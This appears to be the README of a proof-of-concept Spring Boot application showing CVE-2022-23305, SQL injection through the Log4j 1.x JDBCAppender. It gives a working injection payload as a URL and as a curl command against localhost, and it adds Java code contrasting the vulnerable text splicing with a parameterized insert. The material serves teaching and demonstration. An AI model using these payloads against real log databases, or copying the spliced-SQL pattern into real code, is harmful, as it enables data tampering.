This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken from a URL query string parameter. Because Log4j 1.x is configured to use a JDBCAppender, which splices the rendered log message (the %m pattern converter) directly into the configured SQL statement instead of binding it as a parameter, the application is vulnerable to SQL injection.
See src/main/java/poc/InjectionController.java for the logging statement.
See the src/main/resource folder for all the configuration files.
You can run the application using Java and Maven by running "mvn clean spring-boot:run".
You can also run it as a Docker application such as:
docker build --tag log4j-poc .
docker run -p 8080:8080 log4j-poc
The app will be available at http://localhost:8080/.
To exploit the vulnerability, submit an injected SQL statement as the parameter that is being logged:
"http://localhost:8080/?param=');insert into logs values(':("
The response lists the stored log entries, including one that was added by the SQL injected through the parameter.
To do the same with curl, use:
curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('
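To show why the JDBCAppender configuration is injectable, here is an added example (not part of this repository's code) that contrasts the appender's text substitution of %m with a parameterized insert against an H2 in-memory table, using the same parameter value shown above. The logs table with a single message column is constructed for the example, and it assumes the H2 driver is on the classpath.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class JdbcAppenderContrast {
    // The parameter value from the README above, as the controller would receive it
    static final String PARAM = "');insert into logs values(':(";

    // What the Log4j 1.x JDBCAppender does: the rendered message (%m) is spliced
    // into the configured sql pattern as text, so message content becomes SQL.
    static String spliceLikeJdbcAppender(String sqlPattern, String message) {
        return sqlPattern.replace("%m", message);
    }

    // Safe form: bind the message as a parameter; it is stored verbatim and
    // cannot change the structure of the statement.
    static void insertBound(Connection c, String message) throws SQLException {
        try (PreparedStatement ps = c.prepareStatement("INSERT INTO logs VALUES (?)")) {
            ps.setString(1, message);
            ps.executeUpdate();
        }
    }

    static int rowCount(Connection c) throws SQLException {
        try (Statement st = c.createStatement();
             ResultSet rs = st.executeQuery("SELECT COUNT(*) FROM logs")) {
            rs.next();
            return rs.getInt(1);
        }
    }

    public static void main(String[] args) throws SQLException {
        // Constructed schema: one text column, matching the single-value insert above
        try (Connection c = DriverManager.getConnection("jdbc:h2:mem:poc");
             Statement st = c.createStatement()) {
            st.execute("CREATE TABLE logs(message VARCHAR(255))");

            String spliced = spliceLikeJdbcAppender("INSERT INTO logs VALUES ('%m')", PARAM);
            System.out.println("Spliced SQL: " + spliced);
            st.execute(spliced); // H2 runs both statements; a second row appears
            System.out.println("Rows after splice: " + rowCount(c));

            st.execute("DELETE FROM logs");
            insertBound(c, PARAM); // exactly one row, containing the raw parameter text
            System.out.println("Rows after bound insert: " + rowCount(c));
        }
    }
}
```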